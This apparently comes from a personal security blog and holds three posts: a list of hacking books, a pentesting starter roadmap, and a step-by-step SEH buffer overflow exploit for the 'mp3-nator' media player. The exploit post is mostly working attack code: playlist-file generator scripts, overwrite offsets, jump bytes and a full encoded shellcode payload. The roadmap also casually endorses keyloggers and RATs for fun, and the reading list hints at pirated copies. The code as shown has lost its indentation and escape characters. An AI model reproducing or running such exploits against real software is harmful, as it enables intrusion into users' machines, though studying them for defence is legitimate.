Useful books to get into hacking!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

A good book can take you so far. Having some good book really a good idea to learn something new and improving our knowledge. I have posted some useful book’s amazon link (no matter how you get them). These book will really help you much to go into hacking.  After reading these book you will have a very good understanding of system and hacking and you will be able find out the information what you are looking for. There are thousands of free papers but you don’t know what to search and what to learn. After reading these book you will have goal though.

1. C Primer Plus 5th Edition: To get into hacking and penetration we need to understand programming Language. Most of the powerful language is C. This book is very good to learn the C programming language whereas “The C programming language” is bit harder for newbie. Get this book and start reading.

2.  Core Python Application Programming: For automatic and quick task we must need to code in an scripting language(Such as for exploit development). For this, the python is really very powerful(my favorite language). Learn Python from this book. For basic of python get the book “Learn python the hard way” or go to www.python.org tutorial section.

3. Assembly Language Step-by-Step: Assembly language is very very important for understanding how system work and for exploit development. This book will teach you the basic assembly language using nasm which is enough to understand asm registers,instruction and basic coding(such as shellcoding). After read this book you should read intel manuals.

4. Advanced Linux Programming: Don’t avoid the Linux internal. We are required to know Linux Internal And system programming is best to go with. This book is good and freely download-able.

5. Get two books on Windows: Windows® Internals, Part 1: Covering Windows Server® 2008 R2 and Windows 7
and
 Windows Internals, Part 2: Covering Windows Server® 2008 R2 and Windows 7

and read them when you have free time. It is very useful knowing windows internals.

6. Basic of penetration testing 2nd edition: I have read the first edition and it was good for newbie who is coming into hacking. Get Basic idea of penetration testing and hacking from this book.

7. Web application hacker handbook 2nd edition: This is a gold book to learn web hacking. If you are newbie and read this book carefully then you will have a very good understanding of hacking web. I believe you don’t need any other book to learn web hacking. After reading this book you just need to start your real research on web hacking. Another book is owasp “web application penetration testing guide” which a good start too.

8. The shellcoder’s handbook second edition: This book is very good to learn system hacking. It is bit outdated but still very useful. It discussed about common software vulnerability like buffer overflow, format string, shellcoding etc. Get this book!!!

9. Hack using python:  I did not read this book fully but the book is very good if you want to know that how to hack using python programming language. Yes , You should read this book(Get somehow!).

 

10. Corelan: Corelan have more than 11 tutorials which is worth than other commercial exploit development course and books. Read them if you want to move to exploit development and shellcoding. 

11. Metasploit cookbook

Getting started in pentesting!!!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

You also want to get started with pentesting & hacking? There are thousands of guys want to get started with pentesting and hacking but they don’t have any clue that where they should start. So i  quickly wrote this articles so that you can get started very easily without any confusion.

NOTE: Hacking is a long way since it is a research. You need to change your mind completely and be 100% serious that you will start studying to be a hacker or a pentester. If you want to hack for temporary fun, inspire your friend then being a script kiddie is okay(Keylogger and RAT). This is not possible to learn hacking in few months , it may take 3-10 years to be a good one. So you take one option of 1.Become Script Kiddie , 2. Become professional pentester or hacker, security researcher. Up to you!!!  

Basic

1. Basic of Networking: Understanding of networking really important since everything we need to do over network. So you should have a good understanding of tcp/ip and OSI models.

2. Programming: Programming is very important for being a hacker or pentester. Because we must know how a program and system really works. Also Without programming skills it is hard to find a vulnerability. Most important languages you should learn are:

                Python.
                C/C++
                Assembly
                PHP

Intermediate
1. Become A System Administrator: Yes, you need to be a system administrator of Linux and Windows both. If you can’t be a good system administrator then it is not possible to be a good pentester.
2. Writing codes: Write basic code. You don’t need to be software developer. But programming is the best weapon to solve your problem. For example, You want to complete a task automatically(such as deleting a file), Checking hundreds of file permission etc. So write codes!!! Maybe 10-50 lines of codes can do very powerful work for you.
3. Read some online articles, resource:
4. Try to go deeper of the Operating System: Yes, Understand the internal of OS(Windows,linux). If you want to be hacker then you need to know the Operating System very well.

Intermediate+
1. Virtualization :  Get vmware workstation or virtual box . Install various operating system such windows xp,7, redhat,debian etc. Install some additional software and run your port scanner, vulnerability scanner etc. 

2. Old Application and known vulnerability: go to exploit-db.com and get some vulnerable application. Install them on your vm and re-create the exploit. Use your debugger and knowledge. You should install various software including Web or system software. You may get owasp “broken web application”.

3.   Pentesting distro: Install Kali(Backtrack) Linux and use the tools against your vm. 

4. Hack: Hack yourself and hack the vm before going to real world.

Advance
You will understand when you are need of advance knowledge and what is meaning of “advance”.

There are lots of  things you need to become a successful hacker. Everything can take 1,2 or 3 even more years. You need to be patience and serious about hacking. It is not possible to hack or we can’t learn to hack within few days. Just keep going until success and the success will be waiting for you :). Various Books on pentesting is really really very helpful. I will write another new post with review of some books to learn hacking more quickly. 

Exploit writing>>> SEH based!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Today i have re-exploited a software called mp3-nator. SEH based is bit challenging. I am going to show you quickly that how i exploited this SEH based vulnerable using only following tools:

1. Immunity Debugger.
2. mona.py (Corelan).
3. Metasploit(For  shellcode).
4. Vulnerable Application

Access Violation!
First going to make the application crashed(The classic way!). Before that attach the application to immunity debugger. Hope you already know how to attach an application on Immunity Debugger(File>>Attach>> Find Mp3-Nator>>Click on Attach):

The simple python script:

print "Creating expoit."
f=open("nator.plf","w") #Create the file

push="A"*6000

try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

After generating the “nator.plf” we need to open the file:

1. Click on PlayList menu
2. Load PlayList.
3. Open the nator.plf.

But unfortunately it is not going to overwrite the EIP at all because of SEH.

EDX,EBP,ESI and EDI holding our own buffer(We can replace with shellcode!). But SEH also got overwritten by our buffer:

Overwriting SEH mean we can control SEH and Next SEH, Which mean we can make the SEH to divert the call to your shellcode!

What ? What is SEH? The SEH
Buffer space
I used mona.py to create the pattern(metasploit can do this too). If you don’t know to install mona or how to use it then go to  redmine.corelan.be/projects/mona And read the manual.

The simple mona command is : pattern_create 6000 and replace “A” with the pattern saved in indicated location(For me it is on: C:monaMP3N) . Re-generate the nator.plf and open with Mp3-nator on Immunity and we see:

We see SEH and Next SEH got overwritten with mona’s pattern. Actually this time we need to find out how much junk buffer we need to reach the SEH(Same as EIP). Let’s find:

Now we are sure that we need 4112 bytes to overwrite SEH. To be 100% sure we are going to test it again:

print "Creating expoit."
f=open("nator.plf","w") #Create the file

push="A"*4108 #4112-4
push+="B"*4 #Next SEH
push+="C"*4 #SEH
push+="D"*2000 #Shellcode
try:
f.write(push)
f.close()
print "File created"
except:
print "File cannot be created"

If next SEH is “BBBB” and SEH is “CCCC” then we are ready to go 🙂 .

DO SOMETHING WITH SEH and NSEH

 

This time we want to overwrite SEH and Next SEH with an valid address so that it goes to our shellcode. The common address to find “pop pop ret” for SEH and few bytes jump address in Next SEH.

Run mona command !mona seh at crash time ,open the file and find the null-free  address. But unfortunately our life is not that easy so there is no no null-free address. The Exploit is going to be bit challenging.

Anyway, I have choose the address 0x00448f7a of MP3N.exe.  Since we have Null byte at our return address so we simply can’t put our shellcode normally as we did before.

Do the Calculation

 Calculation for storing shellcode 

LONG JUMP
                        
NSEH
Our calculation is done!!!
BUILDING THE EXPLOIT

Now our exploit:

junk+shellcode+nops+jump+nseh+seh+more

in normal SEH based overflow we first find an address for “pop pop ret” and a short jump in NSEH , Such as “xebx08x90x90” but this is forward jump whereas we need backward jump as we already calculated using metasm(jmp $-20) . Anyway, Since we have only null-bytes SEH(0x00448f7a) address so we can’t simply short jump to our nops or shellcode.  For this reason we will need a long jump to land in where our nops starts.

The simple way to explain this,

Junk 2608. Put nops instead “A” to be safe. Then put the 343 bytes shellcode. So stack holding 2608+343 , Then more 1152 nops(x90) and the long jump “xe9x2bxf8xffxff”   . The long jump is some kind of instruction and it is 5 bytes. We now have exact bytes to overwrite the SEH and NSEH with our address:

2608+343+1152+5=4108 .

After the 4108 junk we need NSEH to make a short jump to our long jump. If we make 20 bytes backward jump then we land in our nops within 1152. Remember, Nops does nothing but goes over. So stack simply again executing the long jump  “xe9x2bxf8xffxff”. After executing the long jump it will again go back to our nops within 2608. After the the nops we have shellcode to execute. Since we made 2000 backward jump so it needs 1113 nops to pass to reach our shellcode.

Anyway, Let’s get back to debugger and do some test:

print "Creating expoit."
f=open("nator.plf","w") #Create the file

#343 bytes shellcode
shellcode ="D"*343
nops ="x90"*1152
jump ="xe9x2bxf8xffxff" #Jump back -2000 bytes
nseh ="xebxeax90x90" #short jump
seh ="x7ax8fx44x00" #0x00448f7a
more="x90"*1000

try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"

Open the application on debugger,run and search the SEH address 0x00448f7a . Set a breakpoint by pressing F2.

Now open the nator.plf on the application. Just press SHIFT+F9 at first crash. We hit our breakpoint. If we scroll down a bit lower then we see that we have a bunch of “D” within our 4108bytes

 After pressing SHIFT+F9 we hit the breakpoint. Now press F8 until we reach nop:

We just did a backward jump to 20 bytes nops. Well Let’s keep going with F8. 0012FD53  ^E9 2BF8FFFF      JMP 0012F583 Actually the long jump. And it again goes back to 2000bytes backward where our nops start. So if we keep going by pressing F8 then we will reach the “44” soon which mean “D”, Later we will replace the D with our real shellcode.

 So it is time to put our real shellcode. Here is the final script:

print "Creating expoit."
f=open("nator.plf","w") #Create the file
junk="x90"*2608
#343 bytes shellcode
shellcode =("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
"x4ex46x43x36x42x50x5a")
nops ="x90"*1152
jump ="xe9x2bxf8xffxff" #Jump back -2000 bytes
nseh ="xebxeax90x90" #short jump
seh ="x7ax8fx44x00" #0x00448f7a
more="x90"*1000

try:
f.write(junk+shellcode+nops+jump+nseh+seh+more)
f.close()
print "File created"
except:
print "File cannot be created"

Note: I have copied the shellcode from an working exploit. But you can always generate shellcode using metasploit. Do so!

And pop up the calc:

BOOM!!!

The most important of this exploit is dealing with NULL-BYTES “pop pop ret”.  I hope you now have clear understanding of how to work with these kind of situation. But still if you have any problem , Contact me or comment here and i will try my best to help you!

I have tried to make it simple. If you want to know more about SEH base Exploits , corelan has very good tutorial about SEH:
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/  and

https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Good luck and happy hunting!!!